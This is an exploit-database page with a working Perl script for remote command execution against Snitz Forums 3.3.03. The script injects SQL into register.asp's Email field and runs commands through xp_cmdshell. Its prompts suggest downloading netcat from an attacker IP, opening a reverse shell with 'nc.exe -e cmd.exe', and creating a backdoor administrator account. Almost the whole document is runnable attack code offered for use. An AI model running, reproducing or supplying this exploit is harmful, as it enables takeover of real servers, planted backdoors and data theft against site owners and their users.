0day.today - Biggest Exploit Database in the World.
Snitz Forums 3.3.03 Remote Command Execution Exploit
====================================================
Snitz Forums 3.3.03 Remote Command Execution Exploit
====================================================

#!/usr/bin/perl

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
    $webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
    $port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
    $path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;

if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
    print "Error connecting to $webserver\n";
    exit( 0 );
}
else
{
    my $data1 = $path . "\?mode\=DoIt";
    my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
    my $length = length( $data2 );

    print FILEHANDLE "POST $data1 HTTP/1.1\n";
    if( $port == 80 )
    {
        print FILEHANDLE "Host: $webserver\n";
    }
    else
    {
        print FILEHANDLE "Host: $webserver:$port\n";
    }
    print FILEHANDLE "Accept: */*\n";
    print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
    print FILEHANDLE "Keep-Alive: 300\n";
    print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
    print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
    print FILEHANDLE "Content-Length: $length\n\n";
    print FILEHANDLE "$data2";

    print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
    print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

    close( FILEHANDLE );
}

sub open_TCP
{
    my( $FS, $dest, $port ) = @_;

    my $proto = getprotobyname( 'tcp' );
    socket( $FS, PF_INET, SOCK_STREAM, $proto );
    my $sin = sockaddr_in( $port, inet_aton( $dest ));
    connect( $FS, $sin ) || return undef;

    my $old_fh = select( $FS );
    $| = 1;
    select( $old_fh );
    return 1;
}

# 0day.today [2024-11-15] #